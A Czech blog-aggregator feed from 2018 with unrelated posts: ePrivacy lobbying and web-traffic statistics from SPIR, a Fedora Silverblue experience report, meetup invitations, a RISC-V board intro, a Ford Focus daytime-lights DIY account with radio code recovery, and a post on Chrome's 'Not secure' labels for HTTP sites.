  • že při cílení digitální reklamy na základě cookies, které jsou nově považovány za osobní údaje, se rozhodně nepoužívají adresy, telefonní čísla ani informace o bankovních účtech. Behaviorální reklama se nezaměřuje na konkrétního uživatele, ale na základě kombinovaných, anonymních a sloučených dat stovek tisíc lidí oslovuje např. půl až tři miliony uživatelů najednou.
  • Více než 80 % příjmů vydavatelů pochází z digitální reklamy. Nezíská-li vydavatel souhlas uživatele, přijde o tyto příjmy a nebude moci nadále nabízet své služby zdarma. Přitom 83 % Evropanů dává přednost webovým stránkám zdarma s reklamou před placeným obsahem a 69 % uživatelů internetu chce, aby jejich data o používání prohlížeče byla sdílena výměnou za bezplatný přístup k online obsahu.
  • Návrh nařízení tak vytváří nerovné podmínky na trhu, protože nahrává globálním firmám, které jsou v přímém kontaktu se svými registrovanými uživateli a mohou tak snáz získat jejich aktivní souhlas, zatímco lokální společnosti, které vytvářejí skutečně bohatý obsah a mají dosud věrné, ale neregistrované uživatele, nedokážou souhlasy získat. Nebudou na ně tudíž moci reklamu měřitelně cílit a o příjmy z reklamy tak přijdou.

Pozice SPIR k ePrivacy zůstává stejná jako v listopadu 2017. 

SPIR návrhu Komise ePR vytýká to, že v některých bodech nahrazuje účinné obecné nařízení o ochraně osobních údajů (GDPR) a protiřečí mu. Nastavuje například přísnější podmínky pro zpracování méně rizikových dat a nepočítá s právním titulem oprávněného zájmu. 

Negativní dopad ePR mohou pocítit všechna odvětví digitálního hospodářství EU.  Návrh vytváří dodatečnou zátěž a ohrožuje stávající nabídku a budoucí inovace produktů a služeb pomocí dat. V oblasti poskytování online obsahu bude ohrožena jak cílená reklama, tak nezávislé, tzv. auditované, měření návštěvnosti.

Videa s českými titulky naleznete také zde.

Češi o prázdninách surfují hlavně na mobilech a tabletech

Češi o prázdninách surfují hlavně na mobilech a tabletech tereza.tumova@… Pá, 08/17/2018 - 07:51
Tisková zpráva

Praha, 17. srpna 2018 – Počet reálných uživatelů (RU) měřených TOP 30 webových stránek meziročně vzrostl v průměru o 9 % díky přístupům z mobilních zařízení. Jedná se o dlouhodobý trend, kdy nárůst RU i počtu zhlédnutých stránek z mobilů je vyvážen poklesem přístupů z platformy PC. Internetová populace v ČR dosáhla v červenci 2018 počtu 7,47 mil. uživatelů. Data vyplývají z kvartálních výsledků projektu NetMonitor, které připravuje Sdružení pro internetový rozvoj (SPIR).

„Výsledky měření návštěvnosti webových stránek NetMonitor potvrzují dlouhodobý trend, který je na meziročním srovnání dobře patrný, a to, že se návštěvnost přesouvá do mobilní platformy, která stále ještě mírně roste. Ukazuje se tak, že tzv. mobile first přístup k internetu je již pevně ukotven ve způsobu konzumace online obsahu,“ komentovala výsledky Kateřina Hrubešová, výkonná ředitelka Sdružení pro internetový rozvoj (SPIR). Přístupy z mobilních zařízení v porovnání s přístupy z počítačů nejvíce dominují právě v období letních prázdnin, kdy uživatelé přistupují k internetu z počítačů méně častěji než v ostatních měsících. 

Největší meziroční změnu v počtu reálných uživatelů v top 30 serverech zaznamenal web recepty.cz (+39 %), denik.cz (+34 %) a zive.cz (+31 %). Z pohledu zhlédnutých stránek (PV) došlo k největším meziročním změnám u webových stránek sbazar.cz (+107 %), recepty.cz (+80 %) a zive.cz (+44 %).

Výsledky projektu AdMonitoring budou prezentovány za další čtvrtletí z důvodu neúplných dat způsobených přechodem deklarujících médií, která mají majoritní podíl na výkonech, na novou technologii.

Kompletní výsledky kvartální prezentace naleznete pod článkem.

mezirocni_zmeny_RU_CR+zahr_Y2Y_VII2018/VII2017

mezirocni_zmeny_PV_CR+zahr_Y2Y_VII2018/VII2017

 

Přešel jsem na Silverblue

Na soukromém notebooku už nějaký čas experimentuji. Zhruba rok jsem na něm provozoval rolling release verzi Fedory – Rawhide, nyní jsem se rozhodl, že zkusím neměnný systém a nainstaloval Silverblue.

Život s Rawhidem byl docela bezproblémový , nenarážel jsem na zásadní problémy a zároveň jsem měl vždycky to nejnovější. Nicméně aktualizace byly takové divočejší. Protože soukromý notebook tak často nepoužívám, aktualizoval jsem s většími časovými odstupy a pro jistotu to dělal v jiném tty, aby mi to případný pád terminálu či celého desktopu nepřekazil. Jednou jsem se ale zapomněl, aktualizoval v GNOME Terminalu, desktop zatuhl a vyřešil to až tvrdý restart. A systém se kvůli tomu ocitl v nebootovatelném stavu. Místo oprav jsem se rozhodl udělat to, po čem už jsem nějakou dobu pošilhával: přejít na neměnný systém s atomickými aktualizacemi.

Neměnný systém je dnes v módě. Umožňuje vám mít základní systém, který testujete a distribuujete jako celek. Problém systémů distribuovaných jako balíčky, což je drtivá většina dnešních linuxových distribucí, je v tom, že doinstalováváním balíčků do systému lze vytvořit prakticky neomezené množství kombinací. To je něco, co prostě neotestujete. Distribuce dnes mají řadu mechanismů a pravidel, jak tu integritu držet, ale má to své limity. QA týmy třeba upgrady většinou testují jen se setem základních balíčků a když si uživatel doinstaluje další, tak to ve většině případů funguje, ale prostě ne vždy. Neměnný systém tuto neurčitost řeší. Navíc většinou umožňuje snadný rollback, pokud se něco nepovede. Proto ho dnes najdeme čím dál častěji. Pravděpodobně jej máte i ve svém chytrém telefonu.

Myšlenka neměnného systému se začala rozvíjet ve Fedoře v projektu Atomic. Z něj se časem vyvinul na desktop zaměřený Atomic Workstation a nově projekt s vlastním brandingem Team Silverblue. Základním stavebním kamenem je OSTree, což je velmi zjednodušeně takový git pro souborový systém. V repozitáři na serveru se skládají jednotlivé stromy operačního systému z RPM, každý commit je aktualizace, každá větev jiná verze/vydání systému. S novou aktualizací jen stáhnete nový strom systému, do kterého následně nabootujete. Když je po aktualizaci/upgradu něco špatně, prostě jen v GRUBu vyberete předchozí strom a máte původní systém. OSTree řeší samozřejmě deduplikaci jak při stahování, tak při uložení na disku, takže nároky na přenesená data a místo na disku nejsou tak velké.

Jenže neměnný systém není jenom o tom. Doteď linuxové distribuce fungovaly na principu doinstalovávání softwaru skrze balíčky přímo do systému. Pokud chcete mít neměnný systém, musíte změnit i to, jak instalujete a spouštíte dodatečný software. A právě toto je největší výzva projektu Team Silverblue.

rpm-ostree, což je nástroj na správu OSTree stromů na disku, umožňuje tzv. RPM overlay, neboli vrstvu, do které můžete doinstalovávat dodatečné balíčky. I když lze v případě problémů tuto vrstvu jednoduše odstranit a člověk má pořád k dispozici jednoduché rollbacky, jde to proti myšlence neměnného systému, protože ho mění. Pokud chceme neměnný systém, musíme dodatečný software provozovat v izolovaném prostředí nad ním, typicky kontejnerech.

Silverblue sází na Flatpak, jehož největší repozitář je Flathub, který má momentálně něco přes 350 desktopových aplikací. Jelikož jsem se rozhodl vyzkoušet fungovat se zcela neměnným systémem, RPM overlay vůbec nepoužívám a tudíž mi musí stačit to, co je ve výchozím systému (což je jenom Firefox a základní aplikace GNOME) a aplikace z Flathubu. Po několika týdnech používání musím konstatovat, že mi ta nabídka zatím stačí. Na filmy mám VLC a GNOME MPV, na hudbu Spotify, na chat Telegram Desktop, na grafiku Inkscape a GIMP, na dokumenty LibreOffice a Evince. To všechno jsem ve Flathubu našel.

Další výzvou je, když potřebujete nějaké prostředí pro nedesktopové nástroje. Můžete použít Docker, ale ten není úplně optimální třeba pro vývojové prostředí. Momentálně experimentujeme s podmanem, který dokáže pomocí jednoduchého příkazu vytvořit kontejner s aktuální Fedorou. V budoucnu by to měla být v Silverblue výchozí volba pro terminál. Otevřete aplikaci Terminál a ta automaticky pracuje nad kontejnerem, kde můžete věci rozbíjet, aniž byste ohrozili systém, na kterém běžíte. K tomu se pak dostanete přes něco jako „Terminál – administrace“. Vychází to z myšlenky, že produkční systém, což váš desktopový systém, na kterém závisíte, bezesporu je, by neměl být vaším vývojovým/testovacím prostředím.

Vyladit všechno tak, aby uživatel prakticky nenarážel na žádná omezení neměnného systému a užíval si jeho výhod, je běh na delší trať a je možné, že zcela neměnný systém pro obecnou množinu zařízení ani nebude možný (dodatečné ovladače atd.), ale myslím si, že je to budoucnost i na desktopu (např. momentálně nejpopulárnější linuxový desktopový systém – ChromeOS – přesně na tomto principu pracuje).

Samotné Silverblue už ušlo docela dlouhou cestu. I aktualizace přes rpm-ostree jsou dnes integrované do GNOME Software, takže ani nemusíte do příkazové řádky. Přecházení mezi jednotlivými vydáními je taky elegantně jednoduché. Chtěl jsem zkusit Rawhide, tak jsem jedním příkazem udělat rebase na novou větev. Pak jsem se zase jedním příkazem vrátil na Fedoru 28. Zkuste si toto udělat pomocí balíčkovacího systému. Aktualizace/upgrade je rychlý (pouze stáhnete rozdíly, nemusí se počítat transakce, rozbalovat balíčky…) a bezpečný (dokud nerebootujete, jedete na původním systému, takže se vám to nemůže rozsypat během aktualizace pod rukama).

Skvěle se to také hodí na hledání regresí v aktualizacích. Např. několik dní po vydání Fedory 28 nám začali reportovat uživatelé, že mají na přihlašovací obrazovce anglickou místo české klávesnice. Výchozí instalace F28 tu chybu neměla, takže to musela způsobit nějaká aktualizace. Jenže v prvním týdnu jich tam byly stovky. Vývojář GDM tak šel v OSTree jeden denní commit po druhém, až zjistil, že se to rozbilo se středečními aktualizacemi. rpm-ostree mu vypsal ten den aktualizované balíčky a v nich už bylo možné najít viníka docela jednoduše.

Co vy, už jste systém na podobném principu zkoušeli nebo se dál držíte čistě tradičního balíčkovacího systému? Pokud ne, zkuste se na Silverblue podívat. Instalace je prakticky stejná jako u tradiční Fedory (Anaconda) a rpm-ostree není těžké používat.

Pozvánka na 155.sraz - Brno

srpen
15
Openalt.org

Takže to bude opět v Tanganice (jako minule). Myslím že se osvědčila. Je zamluven stůl v zahrádce – při dešti v salónku – na heslo: Linux v Brně.

Pozvánka na 155. sraz OpenAlt – Praha

srpen
12
Openalt.org

Srpnový pražský sraz spolku OpenAlt se koná ve čtvrtek – 16. 8. 2018 od 19:00 v Kavárně Ideál (Sázavská 30, Praha), kde máme rezervovaný salonek. Tentokrát jsou tématem srazu databáze prezentaci svého projektu si pro nás připravil Standa Dzik. Dále bude prostor, abychom probrali nápady na využití IoT a sítě The Things Network, případně další témata.

Pozvánka na 155. sraz OpenAlt – Praha

srpen
12
Openalt.org
Text: 

Srpnový pražský sraz spolku OpenAlt se koná ve čtvrtek – 16. 8. 2018 od 19:00 v Kavárně Ideál (Sázavská 30, Praha), kde máme rezervovaný salonek. Tentokrát jsou tématem srazu databáze prezentaci svého projektu si pro nás připravil Standa Dzik. Dále bude prostor, abychom probrali nápady na využití IoT a sítě The Things Network, případně další témata.

HiFive1 – deska s otevřeným čipem RISC-V

Zatímco v oblasti softwaru jsme se dostali do stavu, kdy všechny běžné potřeby uživatele lze uspokojit svobodným softwarem (operační systém, nástroje, aplikace…), a uživatel má tak plnou kontrolu nad svým systémem, v oblasti hardwaru jsou stále uživatelé většinou závislí na tom proprietárním-uzavřeném. Uzavřenost – jak softwaru, tak hardwaru – má řadu negativních dopadů. Jde buď o těžko odhalitelné a často neopravitelné chyby nebo o záměrně škodlivé vlastnosti. Poslední roky jsou v tomto ohledu zvlášť bohaté: Intel AMT/ME (trojský kůň přímo v procesoru, před kterým nás FSF varovala už někdy v roce 2014) nebo SpectreMeltdown. Ať už jde o chybu, záměrně škodlivou vlastnost nebo kombinaci obojího, důsledky jsou stejné – počítač přestává poslouchat svého uživatele/vlastníka a řídí se pokyny někoho jiného, komu buď předává naše data (šifrovací klíče, citlivé soubory…) nebo nám zabrání v používání počítače (např. DRM), pozmění či smaže data. Tohle je jednoznačně nežádoucí stav – a to bez ohledu na to, zda jste běžný uživatel, banka, výrobní firma, vládní organizace nebo armáda. Současná situace v oboru je hodně špatná.

SiFive - HiFive1 - RISC-V

Nicméně i v případě hardwaru se situace zlepšuje. Cestou, jak z toho ven, je otevřenost a veřejná kontrola – nad zdrojovým kódem i nad hardwarovými návrhy. Máme poměrně silné hnutí tvůrců otevřeného hardwaru, vzniká spousta desek a zařízení, ke kterým jejich autoři zveřejňují schémata a seznamy součástek, zdrojové kódy firmwarů, návrhy pro FPGA a návody na výrobu. Ale i v těchto případech zůstává většinou zásadní část systému – procesor počítače nebo MCU (microcontroller) menšího zařízení – uzavřená. Není to vinou autorů těchto návrhů, ale tím, že otevřené součástky na trhu chybí – nebo alespoň donedávna chyběly. Ovšem i tady jsme na dobré cestě: máme architekturu OpenPOWER pro výkonné servery a pracovní stanice a máme RISC-V a lowRISC pro menší zařízení.

Lokalizace aplikací v jazyce Python

Výsledkem realizace programu není jen samotný kód a vizuální část programu, ale i textový obsah, který je potřeba lokalizovat. Právě jedna aplikace v jazyce Python vyžadovala lokalizaci a tak jsem zjišťoval jak aplikaci napsanou v jazyce Python lokalizovat. .....

Četné sportovní události zvýšily v červenci zájem o weby v kategorii Sport

Četné sportovní události zvýšily v červenci zájem o weby v kategorii Sport tereza.tumova@… Pá, 08/03/2018 - 10:25

Velké množství sportovních akcí, probíhajících v prvním prázdninovém měsíci, ovlivnilo růst zájmů o sportovní weby. Finále mistrovství světa ve fotbale, Tour de France, tenisový turnaj ve Wimbledonu a další sportovní akce způsobily nárůst návštěvnost webů v kategorii Sport o cirka 10 % na všech zařízeních. Díky tomu získala tato kategorie více než 245 tisíc uživatelů na klasických počítačích, více než 161 tisíc na mobilních telefonech a 43 tisíc na tabletech.

Již několik měsíců roste také kategorie Cestování – prodej, čemuž nahrává prázdninová sezona a dobré počasí. V červenci rostla tato kategorie pouze na klasických PC a tabletech, oproti předchozímu měsíci, zaznamenala pokles na mobilních telefonech. Větší množství volného času během prázdnin či dovolených mohlo ovlivnit také mírný nárůst návštěvnosti u kategorie Zájmové servery, která rostla především na tabletech (10 %). Další kategorií, obsahující weby nezbytné pro plánování prázdnin, jsou Databáze a katalogy, zahrnující mimo jiné online mapy a jízdní řády. Ta rostla na mobilních zařízeních, a je tedy možné předpokládat, že uživatelé navštěvovali tyto weby již přímo na cestách. 

Zajímavá změna nastala u kategorie Těhotenství a rodičovství, která zaznamenala již druhý měsíc více uživatelů na mobilních telefonech než na klasických počítačích. Nárůst počtu reálných uživatelů byl u těchto webů zaznamenán právě pouze u mobilních telefonů, což může naznačovat, že mladí rodiče sledují informace, které je zajímají spíše v rychlosti na telefonech a nemají čas zapnout počítač.

Tab. 1. Výsledky měření návštěvnosti internetu na jednotlivých zařízeních –  červen a červenec 2018.

 

Počítače

Červen

 

Červenec

Absolutní 
změna

Relativní změna

Reální uživatelé (RU)

6 668 190

6 670 096

1 906

0,03%

Zhlédnuté stránky (PV)

13 746 942 792

13 199 367 561

-547 575 231

-3,98%

Reální uživatelé (RU) – PC doma

6 551 363

6 552 145

782

0,01%

Zhlédnuté stránky (PV) – PC doma

10 435 212 343

10 294 350 221

-140 862 122

-1,35%

Reální uživatelé (RU) – PC v práci

1 855 884

1 858 858

2 974

0,16%

Zhlédnuté stránky (PV) – PC v práci

3 311 730 450

2 905 017 340

-406 713 110

-12,28%

Mobilní telefony

Červen

 

Červenec

Absolutní 
změna

Relativní změna

Reální uživatelé (RU)

3 875 849

3 916 337

40 488

1,04%

Zhlédnuté stránky (PV)

2 118 103 303

2 234 345 086

116 241 783

5,49%

Tablety

Červen

 

Červenec

Absolutní 
změna

Relativní změna

Reální uživatelé (RU)

1 641 967

1 638 116

-3 851

-0,23%

Zhlédnuté stránky (PV)

295 120 317

311 267 206

16 146 889

5,47%

 

Zdroj: NetMonitor, červen a červenec 2018.

Ford Focus II - automatické denní svícení

Heslo dne: Arduina už mi nestačí, tak začínám hackovat i auta :-D

Teoretický úvod

U nás platí už nějaký pátek (konkrétně od 1. července 2006) povinnost svítit světly automobilu i ve dne. Výrobci aut na to zareagovali a během pár let doplnili do vozidel kromě potkávacích, obrysových, parkovacích a mlhových světel i světla pro denní svícení - obvykle ve formě elegantního LEDového pásku.

U starších aut speciální světla pro denní svícení nejsou, a tak má řidič jen dvě možnosti:

A) koupí si sadu přídavných světel pro denní svícení a zabuduje si je do auta. O takovém řešení tento článek není, to je totiž příliš jednoduché :-)

B) pro povinné celodenní svícení použije běžná potkávací světla. Ty může zapnout buďto ručně po nastartování, anebo na to použije nějaký automatický systém, který potkávací světla rozsvítí po otočení klíčku do polohy II, případně až po nastartování.

Někdy je tento automatický systém v autě zabudován už od výrobce a stačí ho nějak aktivovat, například přepnutím otočného přepínače světel do speciální polohy. Pokud tam není, je možné ubastlit různě složitý bazmek, který zareaguje na určitou situaci (třeba nastartování) a sám zapne potkávací světla, i když je otočný přepínač světel v poloze 0 (světla vypnuta).

příklad dodělávané chytré krabičky, fotku stránky časopisu jsem našel ve fóru

Ford Focus II

Mám auto Ford Focus vyrobené v březnu 2007, tedy těsně před faceliftem, po kterém Ford do Focusů začal přidávat systém pro denní svícení potkávacími světly. Tudíž jsem si myslel, že mám smůlu, denní svícení v autě není a musel bych ubastlit nějaký ďábelský bazmek, který světla rozsvítí za mě. Proto jsem to celá léta házel za hlavu a víceméně pravidelně zapomínal v autě rozsvítit světla, speciálně když mi do obličeje svítilo Slunce na plné koule, jako je tomu například v tento krásný letní týden.

Už mě to ale dožralo, přecejen příslušníci "Pomáhat a chránit" nevidí zhasnutá světla rádi a protijedoucí řidiči na mě pořád přátelsky blikali, nebo ukazovali různé posunky - třeba jako když chcete ve stínohře ukázat tlamu zvířete, která něco kouše. E?

Proto jsem se začetl do fóra na www.ford-focus.cz a hledal jsem, jak dodělat to rozsvícení potkávacích světel. Našel jsem mnoho a mnoho úžasných informací a řadu různých návodů.  Úplný souhrn a takový rozcestník denního svícení je tady: http://www.ford-focus.cz/forum/viewtopic.php?p=12346.

Ukázalo se, že kromě složitých krabiček s časovači, relé a další automatikou existují i jiné cesty, z nichž ta nejjednodušší je obyčejná dioda vložená na vhodné místo do pojistkové skříně v motoru, která prostě přivede napětí po nastartování (které se tam někde dá najít) do cívky relé pro přední světla. Tím pádem se rozsvítí aspoň ta přední potkávací světla, což by prý zákonu mohlo vyhovět.
Jedna vhodně připojená dioda rozsvítí světla po nastartování. Nevím ale, kde v autě je R6 a R13...

Originální denní svícení

Nejvíc mě ale zaujala jiná věc: ukázalo se, že Ford o povinnosti denního svícení zřejmě tušil už dříve, a tak i Focusy vyrobené před jarem 2007 obsahují téměř kompletní přípravu pro automatické rozsvícení potkávacích světel! Chybí tam jen pár naprostých drobností: jedno relé, tři pojistky a možná doplnit jeden drátek do konektoru.

Celý návod z fóra (autorem je ZaQik) je tady, cituji:

original ford denni sviceni pro FoFo II (Cmax) pred faceliftem:
- pojistka 10A do pozice F71
- pojistka 20A do pozice F48
- pojistka 10A do pozice F45
- rele R15 (patice nahore uprostred kabinove pojistkovky)
- propojit pin 1 a 26 konektoru C96 (velky zeleny na GEMu), neni-li

original ford denni sviceni = rozsviceni celeho auta (jako potkavacky) pri ovladaci svetel v poloze 0 s tim, ze predni svetla maji cca 85% vykon
poloha "0" - potkavaci svetla stale sviti na snizeny vykon pri klicich v poloze II
poloha "AUTO" - potkavaci svetla sviti na snizeny vykon a pokud svetelny senzor vyhodnoti, ze je tma, tak je prepne na 100% (vse pri klicich v poloze II)

Jak vidíte, přišlo mi to velmi jednoduché a elegantní řešení. Proto jsem vyrazil (dle rad dobrodruhů z fóra) na autovrakoviště zakoupit potřebné relé R15. Pro ilustraci fotka na patici úplně jiného relé než R15, ale se stejnými nožičkami, takže člověk věděl, co shánět:



Relé jsem na vrakovišti skutečně sehnal, zaplatil za něj 70 Kč (dle internetu je běžná cena 50 Kč) a uháněl domů. Pak jsem zase uháněl do obchodu, protože jsem doma neměl správné pojistky (takové maličké, asi jen centimetr dlouhé). Všechno je to potřeba zapojit do tzv. GEMu, o kterém nic nevím, ale který vypadá takto:


Našel jsem ho nad nohama spolujezdce, pod takovým jednoduchým krytem - stačilo sundat dvě plastové úchytky, oddělat kryt (snad z papíru, s cenovkou 591 Kč :-O) a pak povolit rukou dva šroubky. Tím se celý ten GEM vyklopí a stane se trochu přístupným.

Vsuvka mimo téma: právě jsem se dočetl, že tato deska řídí celé auto a proto oblíbenou kratochvílí tunerů je sehnat si lepší verzi z jiného auta a nasadit do vlastního - auto pak získá nečekané vlastnosti z nejvyšší příplatkové výbavy.

Do této desky jsem tedy doplnil relé z vrakoviště (na fotce níže ta černá kostička s vodorovným proužkem) a tři zmíněné pojistky - za minutu bylo hotovo.



Pak zbývala poslední "drobnost". Do konektoru C96, který je na fotce výše už vypojený, jsem měl doplnit drátek, který by propojil piny č. 1 s č. 26. Prý ho tam některé auta už mají, asi hlavně ta po faceliftu, ale já jsem takové štěstí neměl:



Když tam piny chybí, těžko je propojit drátkem. Mimochodem, piny jsou na plastovém okraji očíslované 1-15 a pak až 27-41, takže můžete váhat, kde je vlastně pin 26. Na to se mi povedlo najít následující obrázek konektoru C96:

Zbývalo tedy "jen" sehnat piny do tohoto konektoru. Věnoval jsem tomu asi tři dny, objel jsem všechny možné i nemožné servisy včetně specializovaných na autoelektriku, ale nikde jsem nepochodil. Už jsem zvažoval úplně partyzánské akce typu rozšroubovat celou tu GEM desku a zkusit to propojit nějak uvnitř, ale pak mě napadla ještě jedna zoufalá možnost: znovu navštívit vrakoviště a zkusit sehnat celý konektor C96, ideálně s osazenými piny.

Postupně jsem objel dvě vzdálená vrakoviště, než se mi povedlo najít v jednom Focusu daný konektor. Sice taky neměl piny 1 a 26 osazené, ale použil jsem místo nich piny 27 a 16:



Pak už stačilo ustřižené konce spájet, zaizolovat smršťovací trubičkou a zapojit do konektoru:


Po zapojení konektoru C96 zpět do GEMu a zamontování celé parády nad nohy spolujezdce jsem s velkým očekáváním otočil klíčkem do polohy II - a fakt, světla se automaticky rozsvítila. Uff, týdenní mise skončena úspěchem, mám radost a ode dneška už bude moje auto svítit i za plného slunečního svitu :-)

Konec?

Myslíte, že to opravdu bylo tak jednoduché a optimistické? Kdepak! Odpojením konektoru C96 se mi totiž zablokovalo originální autorádio! Teď chce po zapnutí vložit kód, jinak nehraje a ani nic neukazuje (nejvíc naštve nesmyslný čas od nastartování, který nejde přenastavit). Ale jaký kód a kde ho vzít? Takže zpět do fóra a číst a hledat...

OK, takže existují kalkulačky - programy v ruštině pro Windows XP, které po zadání sériového čísla vyplivnou kód pro zadání do autorádia. Super. Takže je potřeba zjistit sériové číslo autorádia. To je na něm napsáno ZEZADU. Takže vymontovat rádio a vytáhnout ho z palubky ven. Na to jsou potřeba čtyři speciální packy. Ty samozřejmě nemám. Co teď? Raději znovu do fóra a hledat hlouběji.

Podařilo se mi najít úžasný návod na zjištění sériového čísla i bez vymontování rádia, cituji (už nevím koho, ale je to ve fóru):

1) zapnout rádio, (většinou výzva k zadání pinu)
2) podržet tlačitko číslo 6 a zmáčknout číslici 1 (právě u 6000CD) případně u jiného typu pokud se vám nic nezobrazí zkusit zmáčknout dvojku - obojí po dobu dvou vteřin
3) zobrazí se vám dlouhé číslo tuším série, rok výroby a typ rádia a posledních 7 znaků (např. M034872 ) je právě chtěné Serial Number 
4) takže bez vyndávání rádia máme SN a pak ho už stačí zadat do "key generator" a vypadne na vás PIN Vašeho rádia :-D
5) pozor na rádiu je pouze šest číslic a může na Vás vypadnout pin třeba 4780 další postup je že na první pozici zmáčkneme 4x číslici 1, na druhé 7x číslici 2, třetí 8x číslici 3, a na čtvrté (nula je buďto na prvním místě, nebo na posledním) 10x číslici 4, a číslicí 5 potvrdíme zadání pin, šipkami se pohybujeme na jednotlivých pozicích(pro případ že se potřebujeme vrátit) No a PAK UŽ NÁM TO HRAJE

Zkusil jsem to a fakt, moje rádio začalo něco ukazovat:


Sériové číslo je až ta nejposlednější změť: V076003. Dobře. Zpět do fóra pro kalkulačku kódu.

Aha, takže kalkulačka funguje pouze pro série začínající "M", zatímco mně začíná sériové číslo rádia "V". Na to kalkulačka neexistuje. D'oh!

Kód tak umí zjistit jen ve Fordu. Tam jsem byl kvůli pinům č.1 a č. 26 v konektoru C96 a jejich odpověď "musíte se objednat, je to potřeba diagnostikovat, ale máme do půlky srpna plno" mě utvrdila v tom, že do značkového servisu už nikdy nepáchnu.

Co teď? Ve fóru se mi podařilo najít parádní databázi sériových čísel a kódů k nim. Soubor se jmenuje FORD Ser.V DATABASE Ver.9.7.7.rar, obsahuje celkem 4437 sériových čísel a moje mezi nimi - co myslíte, je? Správně, není! D'oh2!

Znovu do fóra, opravdová studnice moudrosti. Podařilo se mi tam najít odkaz na podivný web, kde prý za peníze zjistí kód a pošlou jej na mail. Web vypadá fakt úžasně, posuďte sami: http://ukbookshelf.co.uk/



Nicméně tonoucí se stébla chytá, tak jsem tam zaplatil těch 55 Kč přes Paypal a čekal jen pár minut, než mi na mail přistál kód pro mé autorádio. Fungující kód!

Tak a to je už skutečný konec anabáze s oživením originálního denního svícení ve Fordu Focus. Docela mě to povzbudilo k dalším úpravám v autě, tak možná brzy napíšu zas nějaký blog post na toto téma :-)

Pozor na podvodné poukazy

V okurkové sezóně se opět rozjely podvodné kampaně, jen tentokrát místo brýlí Ray-Ban lákají útočníci na poukazy do obchodních řetězců. Jak

Příspěvek Pozor na podvodné poukazy pochází z Spajk.cz

Jak stahovat filmy do iPhonu z Webshare a dalších úložišť

Připravoval jsem se na dlouhou cestu vlakem a chtělo se mi stáhnout si do iPhonu nějaký obsah na cestu, ale

Příspěvek Jak stahovat filmy do iPhonu z Webshare a dalších úložišť pochází z Spajk.cz

Not secure: Chrome a weby na HTTP

červenec
25
Michal Spacek
Not secure | www.ceskatelevize.cz/moje-ct/

Web České televize v Chrome 68

Zatímco Chrome již označuje weby na HTTP vcelku viditelně, tak ostatní prohlížeče to mají stále na kliknutí, jako např. Firefox. Ten bude v agresivnějším označování stránek načtených nezabezpečeným protokolem HTTP pravděpodobně brzy Chrome následovat (o konkrétním datumu ale nevím), podobně jako Safari.

www.ceskatelevize.cz Connection Is Not Secure

Web České televize ve Firefoxu 61

Mezi „velkými“ českými weby, které neumí HTTPS nebo na něj uživatele nepřesměrují, najdete např.:

Seznam dalších padesáti českých webů, kterým je nějaké Not secure šumák (a jejich návštěvníci je taky moc nezajímají) sestavil Troy Hunt a Scott Helme a najdete ho na webu Why No HTTPS?. Najdete tam samozřejmě i jiné země, třeba Slovensko. Předpokládám, že ty weby na HTTPS nakonec dřív nebo později přejdou, ale je k tomu potřeba nemalého úsilí celého odvětví.

Jaká byla cesta?

Popravdě řečeno, měli na to docela dost času, když se podíváme na to, jak přechod na „HTTPS všude“ vypadal z pohledu Google:

Srpen 2014: Google oznamuje, že HTTPS přidává nějaké (v podstatě zanedbatelné) bodíky pro jejich vyhledávač – dobrej tah, šli na to od lesa. Trochu víc se tomu věnuje Pavel Ungr ve svém aktualizovaném článku.

Září 2016: Google píše, že od ledna 2017 bude Chrome zobrazovat Not secure na stránkách načtených přes HTTP s políčkem pro zadání hesla nebo platební karty.

Přihlašovací stránky v Chrome 53: login.example.com; v Chrome 56: (i) Not secure | login.example.com

Chrome zobrazuje Not secure na HTTP stránkách s políčkem pro zadání hesla nebo platební karty od ledna 2017 (zdroj)

Duben 2017: vychází zpráva, že od října 2017 bude Chrome označovat jako Not secure všechny stránky načtené po HTTP, pokud na nich uživatel začne cokoliv vyplňovat. Stránky načtené přes HTTP v Incognito režimu budou jako Not secure označené všechny.

HTTP stránky v Chrome 58: example.com; v Chrome 62 při zadávání dat nebo v Incognito režimu: (i) Not secure | example.com

Od října 2017 jste mohli vidět Not secure na HTTP stránkách při zadávání dat nebo v Incognito režimu (zdroj)

Únor 2018: dozvídáme se, že od července bude Chrome označovat všechny stránky načtené přes HTTP jako Not secure, zatím jen s šedým (i).

HTTP stránky v Chrome 64: example.com; v Chrome 68: (i) Not secure | example.com

Od včerejška zobrazuje Chrome text Not secure na všech HTTP stránkách (zdroj)

No a tak jsme tu, v červenci roku 2018. Dobrá práce a díky všem, kteří nás až sem dostali! Před pár lety jsem si to nedokázal představit a myslel jsem, že se toho nedožiju. Když o tom mluvím na školení HTTPS (13. prosince 2018 Praha), tak normálně dostávám husí kůži.

Mimochodem, Google si ty datumy necucá z prstu, ale sledují počty načtených stránek na HTTPS a podle toho změny dělají. V USA je 84 % všech stránek v Chrome načtených přes HTTPS, v Japonsku 66 %. Kdyby ta procenta byla nižší, tak by takové změny nedělali, protože by to znamenalo, že uživatel uvidí Not secure příliš často a začne to ignorovat. Ve Firefoxu jsou procenta načtených stránek po HTTPS podobná.

Je důležité si uvědomit, že stránka není web, takže když někdo používá celej den jeden web, např. Facebook nebo Gmail, tak všechny načtené stránky budou po HTTPS, ale pořád je to jen pár webů. Nedávno jsem zkusil odhadnout kolik českých webů je na HTTPS a vyšlo mi 20–30 %.

Co nás čeká dál?

září tohoto roku uvidíte na HTTPS stránkách v Chrome šedý rámeček místo zeleného a zmizí nápis Secure. No a nakonec zmizí i ten šedý zámek.

HTTPS stránky v Chrome 69: 🔒 example.com; finální stav: example.com

Od září zmizí Secure a zámeček zešedne a nakonec zmizí taky (zdroj)

říjnu se v Chrome změní šedé (i) v kroužku před Not secure na červený trojúhelník s vykřičníkem, když uživatel začne na stránce načtené přes nezabezpečený protokol HTTP něco vyplňovat.

HTTP stránky finální stav: ⚠ Not secure | example.com

Ve finále budou všechny stránky na HTTP označené červeným ⚠ Not secure (zdroj)

Finální stav, zatím bez konkrétního datumu, bude takový, že stránky načtené přes HTTPS nebudou mít žádné extra označení, zatímco ty načtené po HTTP budou mít Not secure s červeným trojúhelníkem. A tak to má být, HTTPS je normální a je potřeba všude, i na obyčejném statickém webu. A co vy, už máte web na HTTPS?

Budoucnost je tu

Některé změny uvedené výše si můžete vyzkoušet již dnes.

Chcete vidět finální červené ⚠ Not secure? Změňte nastavení chrome://flags/#enable-mark-http-as na „actively dangerous“.

